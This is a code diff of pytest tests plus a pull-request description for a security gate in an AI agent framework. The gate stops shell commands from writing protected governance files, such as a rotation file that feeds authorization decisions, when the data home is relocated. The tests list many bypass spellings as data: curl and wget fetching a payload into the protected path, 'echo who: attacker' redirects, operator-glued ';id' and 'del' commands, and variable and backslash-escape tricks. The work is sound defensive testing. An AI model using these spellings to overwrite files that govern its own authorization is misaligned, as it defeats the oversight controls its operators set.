+        monkeypatch.setenv("KIROCREW_HOME", str(home))
+        root = str(home).replace("\\", "/")
+        plain = f"{root}/{self.LEAF}"
+
+        assert security.is_sensitive_write_path(
+            plain
+        ), "precondition: the tool gate fences the plain spelling"
+        for spelling in (
+            plain.replace("apps/", "apps//"),
+            plain.replace("apps/", "apps/./"),
+            plain.replace("/rotation.yaml", "//rotation.yaml"),
+            plain.replace("apps/", "apps/zz/../"),
+        ):
+            assert (
+                is_sensitive_bash_command(f"echo x > {spelling}") is not None
+            ), f"shell write not blocked for remainder spelling: {spelling!r}"
+            assert (
+                is_sensitive_bash_command(
+                    """python -c "open('{}','w').write('x')" """.format(spelling)
+                )
+                is not None
+            ), f"embedded-script write not blocked for remainder spelling: {spelling!r}"
+
+        assert (
+            is_sensitive_bash_command(f"echo hi > {root}/apps//notes.txt") is None
+        ), "an ordinary file under the override must stay writable"
+
+    def test_a_path_attached_to_a_short_option_is_still_fenced(self, tmp_path, monkeypatch):
+        """An output path glued onto a short option has no delimiter before it.
+
+        ``curl -o/custom/root/rotation.yaml URL`` attaches the path directly to
+        ``-o`` -- no whitespace, quote, or ``=`` in between -- so a left
+        boundary of delimiter-then-path never fires, while the tool gate
+        resolves the argument and refuses the very same file. The negative
+        controls keep the widened boundary honest: an ordinary file attached to
+        an option, a sibling root, and a longer path that merely CONTAINS the
+        root as a suffix must all stay unfenced.
+        """
+        home = tmp_path / "crewhome"
+        home.mkdir()
+        monkeypatch.setenv("KIROCREW_HOME", str(home))
+        root = str(home).replace("\\", "/")
+        path = f"{root}/{self.LEAF}"
+
+        assert security.is_sensitive_write_path(
+            path
+        ), "precondition: the tool gate fences the file however it is spelled"
+        for spelling in (
+            f"curl -o{path} https://x.example/payload",
+            f"curl -sSLo{path} https://x.example/payload",
+            f"wget --output-document={path} https://x.example/payload",
+        ):
+            assert (
+                is_sensitive_bash_command(spelling) is not None
+            ), f"attached-option write not blocked: {spelling!r}"
+
+        assert (
+            is_sensitive_bash_command(f"curl -o{root}/notes.txt https://x.example/payload") is None
+        ), "an ordinary file under the override must stay writable"
+        sibling = str(tmp_path / "crewhome-two").replace("\\", "/")
+        assert (
+            is_sensitive_bash_command(f"curl -o{sibling}/{self.LEAF} https://x.example/payload")
+            is None
+        ), "a sibling root that merely shares a prefix is not the data home"
+        assert (
+            is_sensitive_bash_command(f"echo x > /x{path}") is None
+        ), "a longer path containing the root as a suffix must not match"
+
+    def test_both_spellings_of_a_relocated_root_are_fenced(self, tmp_path, monkeypatch):
+        """A symlinked ``KIROCREW_HOME`` has two spellings; the gate owes both.
+
+        When the override is a symlink -- or a junction, or any path whose real
+        location differs from the one that was configured -- the LEXICAL path is
+        what the operator set and therefore what a command carries, while
+        ``_resolved_root_key`` reports the RESOLVED real path. An anchor built
+        from the resolved path alone is bypassed by naming the lexical one:
+        ``python -c "open('<lexical>','w')"`` reaches the governance file
+        through a root the pattern never saw, while the tool gate refuses it.
+
+        The divergence is injected at the RESOLVER seam rather than by creating
+        a real symlink. ``os.symlink`` needs elevation or Developer Mode on
+        Windows, and the causal condition under test is
+        ``lexical spelling != resolved spelling`` -- not the OS call that
+        produces it, which would make the case skip on exactly the platform
+        where a junction is the ordinary way to relocate a data home. The seam
+        is patched to its real contract (``_resolved_root_key`` returns a
+        ``_ResolvedRoots`` named tuple) via ``_replace(crew_home=...)`` on the
+        genuine value, so every other anchor field is preserved and only the
+        crew root moves -- the ``~/.kiro/agents`` anchor keyed on ``kiro_home``
+        is left intact.
+        """
+        alias = tmp_path / "alias-home"
+        real = tmp_path / "real-home"
+        alias.mkdir()
+        real.mkdir()
+
+        roots = security._resolved_root_key()
+        monkeypatch.setenv("KIROCREW_HOME", str(alias))
+        stub = roots._replace(crew_home=str(real))
+        monkeypatch.setattr(security, "_resolved_root_key", lambda: stub)
+
+        for label, root in (("resolved", real), ("lexical", alias)):
+            path = self._resolved(root, self.LEAF)
+            posix = path.replace("\\", "/")
+            for cmd in (
+                f"echo 'who: attacker' > {path}",
+                f"""python -c "open('{posix}','w').write('x')" """,
+            ):
+                assert (
+                    is_sensitive_bash_command(cmd) is not None
+                ), f"{label} spelling of the same protected leaf is not fenced: {cmd!r}"
+
+        # Controls -- widening the anchor to two roots must not fence more than
+        # the two roots. An ordinary file under the lexical home stays writable,
+        # and a SIBLING root that merely shares its prefix is not the data home.
+        assert is_sensitive_bash_command(f"echo hi > {alias / 'notes.txt'}") is None
+        sibling = self._resolved(tmp_path / "alias-home-two", self.LEAF)
+        assert is_sensitive_bash_command(f"echo x > {sibling}") is None
+
+    def test_an_ordinary_file_under_the_override_stays_writable(self, tmp_path, monkeypatch):
+        """The branch fences named leaves, not the whole data home.
+
+        Blocking everything under the override would refuse the agent its own
+        workspace on exactly the installs this fix targets.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+
+        assert is_sensitive_bash_command(f"echo hi > {tmp_path / 'notes.txt'}") is None
+
+    def test_the_home_spellings_are_unchanged(self, tmp_path, monkeypatch):
+        """The pre-existing strategies must survive the added branch.
+
+        Asserted WITH an override set, because that is the configuration whose
+        pattern is rebuilt: a command naming ``~/.kiro/crew/...`` is still a
+        command naming a fenced path, whatever the resolved home is.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+
+        for home in ("~", "$HOME", "/home/alice", "/Users/alice"):
+            cmd = f"echo x > {home}/.kiro/crew/{self.LEAF}"
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+
+    def test_changing_the_override_re_keys_the_compiled_pattern(self, tmp_path, monkeypatch):
+        """The pattern embeds the resolved home, so it cannot be cached forever.
+
+        Both directions matter. A stale pattern built for the PREVIOUS home
+        fails OPEN on the current one -- the bug this fix exists to close,
+        reintroduced through the cache.
+        """
+        home_a = tmp_path / "a"
+        home_b = tmp_path / "b"
+        home_a.mkdir()
+        home_b.mkdir()
+        path_a = self._resolved(home_a, self.LEAF)
+        path_b = self._resolved(home_b, self.LEAF)
+
+        monkeypatch.setenv("KIROCREW_HOME", str(home_a))
+        assert is_sensitive_bash_command(f"echo x > {path_a}") is not None
+
+        monkeypatch.setenv("KIROCREW_HOME", str(home_b))
+        assert is_sensitive_bash_command(f"echo x > {path_b}") is not None, (
+            "the pattern was still built for the previous home -- the gate is "
+            "open on the home actually in use"
+        )
+
+    def test_dropping_the_override_returns_to_the_default_home(self, tmp_path, monkeypatch):
+        """A path that was the data home is an ordinary directory once it is not.
+
+        Keeping it fenced would leave a test or embedder blocked on a tmp dir
+        for the rest of the process.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        path = self._resolved(tmp_path, self.LEAF)
+        assert is_sensitive_bash_command(f"echo x > {path}") is not None
+
+        monkeypatch.delenv("KIROCREW_HOME", raising=False)
+        assert is_sensitive_bash_command(f"echo x > {path}") is None
+        assert (
+            is_sensitive_bash_command(f"echo x > ~/.kiro/crew/{self.LEAF}") is not None
+        ), "the default-home spellings must still be gated with no override set"
+
+    def test_the_kirocrew_home_variable_spelling_is_fenced_too(self, tmp_path, monkeypatch):
+        """A command can name the override through ``$KIROCREW_HOME`` itself.
+
+        Every spawned shell inherits ``KIROCREW_HOME`` and expands it to the
+        protected tree, so ``> "$KIROCREW_HOME/<leaf>"`` reaches the very file
+        the resolved-literal branch fences -- and the tool gate, which expands
+        the variable before applying the write fence, refuses it. A
+        literal-only anchor answered differently, which is the asymmetry this
+        class forbids. The bare/braced POSIX forms the shlex normalizer already
+        expands at the top level are covered by the sibling assertions; the
+        forms below are the ones the normalizer does NOT expand -- inside an
+        ``sh -c`` quote, a brace MODIFIER, and the Windows/PowerShell spellings.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        leaf = self.LEAF
+
+        for label, cmd in (
+            ("sh -c quoted", f"""sh -c 'echo x > "$KIROCREW_HOME/{leaf}"'"""),
+            ("brace modifier", f'echo x > "${{KIROCREW_HOME%/}}/{leaf}"'),
+            ("cmd percent", f"echo x > %KIROCREW_HOME%\\{leaf}"),
+            ("cmd delayed", f"echo x > !KIROCREW_HOME!\\{leaf}"),
+            ("pwsh env", f"Set-Content $env:KIROCREW_HOME/{leaf} x"),
+            ("pwsh braced env", f"Set-Content ${{env:KIROCREW_HOME}}/{leaf} x"),
+        ):
+            assert (
+                is_sensitive_bash_command(cmd) is not None
+            ), f"variable spelling bypasses the fence ({label}): {cmd!r}"
+
+    def test_an_operator_glued_onto_the_path_still_terminates_it(self, tmp_path, monkeypatch):
+        """A shell operator is a path terminator, same as a space or a quote.
+
+        ``echo x > $KIROCREW_HOME/<leaf>;id`` glues the operator straight
+        onto the protected path with no whitespace or quote in between; the
+        shell still ends the word there and the write still lands on the
+        fenced file. The crew branch shares branch (3)'s ``path_end``
+        terminator class so every operator that closes a default-home path
+        closes a custom-home path too -- a bespoke terminator here omitted
+        the operator class and left these spellings open (found in review).
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        leaf = self.LEAF
+
+        for label, cmd in (
+            ("semicolon", f"echo x > $KIROCREW_HOME/{leaf};id"),
+            ("pipe", f"cat $KIROCREW_HOME/{leaf}|wc -l"),
+            ("ampersand", f"type %KIROCREW_HOME%\\{leaf}&del x"),
+            ("backtick", f"Set-Content $env:KIROCREW_HOME/{leaf}`id`"),
+            ("paren", f"(cat $KIROCREW_HOME/{leaf})"),
+            ("redirect", f"cat $KIROCREW_HOME/{leaf}>out"),
+        ):
+            assert (
+                is_sensitive_bash_command(cmd) is not None
+            ), f"operator-glued spelling bypasses the fence ({label}): {cmd!r}"
+
+    def test_a_different_variable_named_like_the_override_is_not_fenced(
+        self, tmp_path, monkeypatch
+    ):
+        """``$KIROCREW_HOME_BACKUP`` is a DIFFERENT variable, not the override.
+
+        The var anchor must terminate the reference at its own boundary -- a
+        following separator for the bare form, the closer for the delimited
+        forms -- so a longer name that merely starts with ``KIROCREW_HOME`` does
+        not match. Over-fencing here would refuse ordinary files the tool gate
+        allows, the opposite failure mode of the branch this test guards.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+
+        for cmd in (
+            f"echo x > $KIROCREW_HOME_BACKUP/{self.LEAF}",
+            f"echo x > ${{KIROCREW_HOME_BACKUP}}/{self.LEAF}",
+            # The variable named but no protected leaf after it -- the agent's
+            # own workspace under the override stays writable.
+            "ls $KIROCREW_HOME/apps",
+            "echo hi > $KIROCREW_HOME/notes.txt",
+        ):
+            assert (
+                is_sensitive_bash_command(cmd) is None
+            ), f"a non-override reference must stay writable: {cmd!r}"
+
+    def test_toggling_the_override_does_not_rebuild_an_already_seen_pattern(
+        self, tmp_path, monkeypatch
+    ):
+        """An env round-trip must serve compiled patterns from cache, not rebuild.
+
+        The suite (and any embedder) flips ``KIROCREW_HOME`` constantly:
+        monkeypatch sets it, teardown restores it. A single-slot cache keyed on
+        the raw value re-runs the full pattern-bank BUILD on every flip -- and
+        ``re``'s own 512-entry module cache clears wholesale mid-suite, so the
+        build's giant compile periodically runs for real too. That lands tens of
+        milliseconds inside whatever the NEXT caller happens to be timing; on a
+        loaded CI runner it is the difference between the traversal perf budget
+        passing and failing. Per-key caching makes the round-trip free: each
+        distinct env value builds exactly once per process.
+        """
+        builds = 0
+        real_build = security._build_sensitive_regex
+
+        def counting_build():
+            nonlocal builds
+            builds += 1
+            return real_build()
+
+        monkeypatch.setattr(security, "_build_sensitive_regex", counting_build)
+        override = str(tmp_path / "crew-home")
+
+        monkeypatch.delenv("KIROCREW_HOME", raising=False)
+        security.is_sensitive_bash_command("echo warm")
+        monkeypatch.setenv("KIROCREW_HOME", override)
+        security.is_sensitive_bash_command("echo warm")
+        first_pass = builds
+        assert first_pass <= 2  # at most one build per distinct key
+
+        # Round-trip back through both already-seen keys: zero further builds.
+        monkeypatch.delenv("KIROCREW_HOME", raising=False)
+        security.is_sensitive_bash_command("echo warm")
+        monkeypatch.setenv("KIROCREW_HOME", override)
+        security.is_sensitive_bash_command("echo warm")
+        assert builds == first_pass, (
+            f"env round-trip re-ran the pattern build {builds - first_pass} "
+            "time(s); already-seen keys must be cache hits"
+        )
+
+
 class TestAuditBashCommand:
     """Tests for audit_bash_command()."""
 

--- a/test/test_security_regex_linearity.py
+++ b/test/test_security_regex_linearity.py
@@ -283,7 +283,7 @@ def test_sensitive_anchor_has_no_leading_wildcard() -> None:
     # Count the BRANCH spelling (``rf"|`` prefix) so the explanatory comment in
     # `_build_sensitive_regex`, which quotes the anchor in prose, is not counted.
     branch_anchor = r"""rf"|(?:^|[\s'\"=:,;])"""
-    assert source.count(branch_anchor) == 11
+    assert source.count(branch_anchor) == 12
 
 
 def inspect_source(func: object) -> str:


### PR DESCRIPTION
## Problem / Motivation

The two gates that fence a write-protected file under the data home disagree
about a non-default `KIROCREW_HOME`:

- **The tool gate** — `security.is_sensitive_write_path()` — resolves through
  `config_dir()`, so it follows the override.
- **The bash gate** — `security.is_sensitive_bash_command()` — is a string
  matcher over the home SPELLINGS a command can carry (`~`, `$HOME`,
  `/home/<user>`, `%USERPROFILE%`) followed by a crew prefix (`.kiro/crew`,
  `.kirocrew`). A resolved override path carries **neither**.

So on such an install a write-protected file is fenced against the agent's file
tools and reachable by a bash redirect naming its real path. Protected on one
path only is not protected.

Reproduction from #4082, run against `main` and against this branch:

```
resolved:  <KIROCREW_HOME>/apps/ops-mission-control/data/rotation.yaml

                                             main     this branch
is_sensitive_write_path      (tool gate)     True     True
is_sensitive_bash_command    (shell gate)    None     Blocked
  ...POSIX spelling of same                  None     Blocked
  ...raw-text / embedded-script .env spelling    None     Blocked
  ...the ~/.kiro/crew/... spelling           Blocked  Blocked
  ...an ordinary file under the home         None     None
```

## Why it matters

`rotation.yaml` is the worked example because it is an INPUT TO AN
AUTHORIZATION DECISION — an agent that names its own login there makes
`rotation.authorize_action` accept a forged shift — but the gap is generic to
every entry on the write-protected bash floor **and** to raw-text, embedded-script,
and Windows-native spellings of crew-prefixed `_SENSITIVE_HOME_DIRS` entries.
Ordinary path-like custom-home `.env` forms may already be caught by the base
`is_sensitive_path()` normalizer; this PR does not claim that all such forms were
previously unprotected.

A custom `KIROCREW_HOME` is a normal single-instance install, not an exotic
configuration — `kirocrew pod` and `dev-backend.sh` both use one routinely.

## What changed (motivation → approach → change)

**Motivation** — make the shell gate fence the same files the tool gate already
fences, without widening what either one blocks on a default install.

**Approach** — reuse the tool gate's own resolution rather than inventing a
second one. `_resolved_root_key` is what `_home_dir_targets` already keys its
target set on, and `_home_dir_targets_uncached` already re-anchors every
crew-prefixed entry under the resolved home for exactly this reason. Deriving
the shell branch from those same two inputs is what keeps the gates from
drifting apart again.

**Change** — `_build_sensitive_regex` gains **one more alternative**, anchored on
the resolved crew home and carrying the same remainders the tool gate
re-anchors there.

The remainders are derived by stripping whichever crew prefix an entry carries,
so a leaf added to `_SENSITIVE_HOME_DIRS` or `_WRITE_PROTECTED_BASH_LEAVES` is
covered on both paths without a second edit.

`_resolved_root_key` only reads and resolves the env var: **none** of
`config_dir()`'s start-of-process maintenance (mkdir, legacy migration,
breadcrumb refresh, archive sweep) runs on this gate path. It answers `None` for
a default home, where the branch is omitted entirely and the compiled pattern is
byte-identical to before.

Both separators are accepted in the anchor: the resolved literal is
all-backslash on Windows while git-bash and msys tooling render the same root
with `/`.

The root segments are joined with the generalized separator the fenced-dir
branches above already use (canonical `\.` and `\X\..` no-op chains), plus
repeated-separator tolerance. A root is as spellable as the remainder —
`/x/./home`, `/x//home` and `/x/zz/../home` all name the same directory, and
the tool gate fences every one because it resolves — so an exact-literal root
would fence none of them.

### The anchor tolerates shell backslash escapes

The generated path fragments accept an optional backslash before **every**
character, not only before whitespace. An unquoted POSIX shell removes a
backslash escape before the path is resolved, whatever character follows it.
Measured, not assumed:

```
unquoted   cr\ewhome   -> crewhome      the escape collapses
double-q  "cr\ewhome"  -> cr\ewhome     the backslash survives
single-q  'cr\ewhome'  -> cr\ewhome     the backslash survives
```

So a command can spell a protected path with a backslash anywhere and still
reach that exact file. Tolerating it only before whitespace left every other
position open — an authorization bypass, since the tool gate resolves the path
and refuses it while the shell gate did not. Whitespace additionally folds
space and tab into one class: a path containing a space cannot appear bare in a
command at all, and `C:\Users\First Last` is an ordinary profile directory.

**This over-matches, deliberately and in the fail-safe direction.** The quoted
spellings above keep the backslash and therefore name a *different* path, but
this gate matches raw command text and cannot see quoting, so it fences them
too. Refusing a path that would not have resolved here is safe; missing one
that would is the bypass being closed. Segments never contain a separator (the
caller splits on `[\\/]` first), so no separator ambiguity is introduced.

Widening a security pattern was measured rather than argued — branch vs `main`,
same process shape, `KIROCREW_HOME` set:

| | main | branch |
|---|---|---|
| compiled pattern length | 15422 | 19135 (+24%) |
| repo's catastrophic-backtracking guard input | 3.47s | 3.72s (+7%) |
| 200 consecutive backslashes (adversarial) | 0.015s | 0.015s |
| 500 non-matching commands | 1.23s | 1.11s |

`\\?X` is near-deterministic because `\` and `X` are disjoint for every
character in these paths, so the optional group does not create the ambiguity
that drives backtracking.

### The pattern cache had to be re-keyed

The compiled pattern is cached in `_SENSITIVE_RE` and now embeds a resolved
path. A stale pattern built for a PREVIOUS home fails **open** on the current
one — this same bug, reintroduced through the cache. `_get_sensitive_re` now
re-keys on `KIROCREW_HOME`.

Keyed on the RAW env var rather than the resolved root because this is read on
every gate call and resolving would put a `Path.resolve()` on that hot path. The
residual — a symlink UNDER the override repointed mid-process — can only leave
the resolved-literal branch naming the old location; it removes no existing
branch, so the home-spelling and bare-leaf strategies are unaffected and the
gate cannot fall below what it matched before.

## Tests

**New: `test/test_security.py::TestBashGateFollowsACustomKirocrewHome`** (11
tests). Each one pins **parity** rather than the branch: the assertion states
what the tool gate already answers and requires the shell gate to answer the
same, so the class keeps its meaning if the implementation is rewritten.

| Test | Behavior locked in |
|---|---|
| `test_the_two_gates_agree_on_a_write_protected_leaf` | The parity statement itself, with the tool-gate answer asserted first as a precondition so the class cannot silently stop testing anything |
| `test_every_write_form_is_refused_not_just_a_redirect` | Verb independence across redirect / `cp` / `tee` / `python -c open` / `sed -i` / `mv` — a narrow verb allowlist is bypassable |
| `test_a_crew_secret_leaf_under_the_override_is_blocked_too` | Raw-text / embedded-script `.env` spellings follow the override too; ordinary path-like forms may already be covered by base normalization |
| `test_either_separator_spells_the_same_root` | The resolved literal is all-backslash on Windows; the `/` spelling a shell actually carries names the same root |
| `test_an_ordinary_file_under_the_override_stays_writable` | The branch fences named leaves, not the whole data home — the false-positive floor |
| `test_the_home_spellings_are_unchanged` | `~` / `$HOME` / `/home/<user>` / `/Users/<user>` still match, asserted **with** an override set (the configuration whose pattern is rebuilt) |
| `test_changing_the_override_re_keys_the_compiled_pattern` | Home A then home B in one process; a pattern still built for A fails open on B |
| `test_a_home_with_a_space_is_fenced_in_every_shell_spelling` | All four shell spellings of a home containing a space (bare / double-quoted / single-quoted / backslash-escaped) — a literal anchor fences three and leaves the fourth open |
| `test_a_canonical_no_op_spelling_of_the_root_still_anchors` | Five spellings of the same root (plain, `/./`, `//`, `/x/../`, backslash) — plus two negative controls: a sibling root sharing a prefix is not fenced, and an ordinary file under the real root stays writable |
| `test_both_spellings_of_a_relocated_root_are_fenced` | A symlinked/junctioned override names one directory under two paths — the lexical one the operator configured and the resolved real one — and both must be fenced; divergence is injected at the resolver seam, so the case needs no elevation and does not skip on Windows |
| `test_dropping_the_override_returns_to_the_default_home` | Unsetting returns the tmp dir to being an ordinary directory, and the default-home spellings stay gated |

| `test_an_escaped_ordinary_character_does_not_bypass_the_fence` | A shell backslash before an ordinary character — pinned at four positions (mid-root, first character of a root segment, mid-remainder, mid-intermediate-dir), each via both a redirect and an embedded `python -c`, with the tool gate asserted first as the reference answer; plus two controls so the widening cannot fence more than the root |

**Fail-before / pass-after.** Run against pristine `origin/main` the class is
**9 failed / 2 passed** — and the 2 that pass are exactly the controls that must
not change (`test_an_ordinary_file_under_the_override_stays_writable`,
`test_the_home_spellings_are_unchanged`). Against this branch, **12 passed**.

The escaped-character regression was added in response to a blocking review on
`cf6fc0d9` and verified the same way, with only `security.py` reverted: **1
failed / 11 passed** before, **12 passed** after. The other 11 pass on both
sides, so that change is additive rather than a rewrite of this branch.

**Updated: `ops_mission_control/tests/test_security.py::test_the_shell_path_is_closed_too`.**
This is the test that surfaced the bug. It *recorded* the asymmetry in its
docstring rather than pinning it, because handing it the resolved path asserted
nothing while the suite read the operator's real home; pinning `KIROCREW_HOME`
per test in #4065 made that visible. It now asserts the resolved form alongside
the home spellings — **4 failed on `main`, 43 passed here**.

**Regression suites**, run with `-p no:randomly`:

- `test_security.py`, `test_governance_self_protection.py`,
  `test_connections_tool_aliases.py`, `test_browser_cli_launch.py`,
  `test_mcp_cron_security.py`, `ops_mission_control/tests/test_security.py`
  — **1033 passed, 18 skipped**, plus one failure that is not from this diff:
    `TestHomeDirTargetsCache::test_second_call_does_not_rebuild` (`assert 8 ==
    1`) reproduces identically on pristine `main` under the same load and
    passes when its class runs alone — a wall-clock-vs-TTL flake in that test
- `test_hooks.py`, `test_config_loader.py`, `test_computer_use_api.py`,
  `test_computer_use_enable_state.py`, `test_spawn_audit.py`
  — **575 passed, 7 skipped**, plus one Windows-local symlink failure
  (`TestSafeReadFile::test_allows_benign_symlink`, `WinError 1314`, needs
  elevation) that reproduces identically on pristine `main` on this host.

`flake8` clean on both changed source files. `mypy src/kiro_crew/security.py`
reports 3 errors — `resource.getrlimit` / `RLIM_INFINITY` / `setrlimit` at lines
8695-8703, POSIX-only attributes that are pre-existing on Windows and untouched
by this diff.

## Manual verification

The reproduction table under **Problem / Motivation** was run as a standalone
probe against both trees (a pristine `origin/main` worktree vs this branch),
outside pytest, so the result does not depend on any fixture. It exercises the
issue's own scenario end to end: set `KIROCREW_HOME`, resolve
`schedule_file.schedule_path()`, and hand the resolved path to both gates.

Cross-tree baselines were taken by copying the changed test files into a clean
`origin/main` worktree and running pytest **there**, rather than by pointing
`PYTHONPATH` at it — the repo's conftest inserts the invoking worktree's `src`
ahead of `PYTHONPATH`, so the latter silently tests the branch and reports green.

### Scope

`security.py` is the keystone gate and `backend-security-controls` is a
`blocking: true` AUTOSDE rule, so this is deliberately the only production
change in the diff: one added alternative, one cache key. The read gate's
`_SENSITIVE_HOME_DIRS` question raised at the end of #4082 is answered by the
same branch — the crew-prefixed entries of that list are part of the remainder
set, and `test_a_crew_secret_leaf_under_the_override_is_blocked_too` pins it.

## Related Issues

Fixes #4082

Context: #4065, which pinned `KIROCREW_HOME` per test and made the asymmetry
visible.

## Checklist

- [x] Single commit with a Conventional Commits title (`feat|fix|docs|refactor|perf|test|chore|ci|build|revert: ...`)
- [x] Existing tests pass and new tests added for new functionality
- [x] Self-review completed; code follows project style guidelines
- [x] Documentation updated (if applicable) — `docs/architecture/security-deep-dive.md`, Layer 2
- [x] No secrets, credentials, or internal references in the diff

## Contribution License Agreement

The repository template currently contains an OSPO placeholder, so no CLA wording is reproduced.



## Pattern harvest
Rule candidate: lint/AST check
Pattern: a regex path-fence branch defining its own bespoke right-boundary (terminator) class instead of reusing the module's shared `path_end` — each private terminator that omits the shell-operator class reopens the operator-glued bypass this PR's R4 round fixed. Candidate check: flag any new string-literal terminator alternation in `security.py` fence branches that is not composed from `path_end`/`win_sep`.
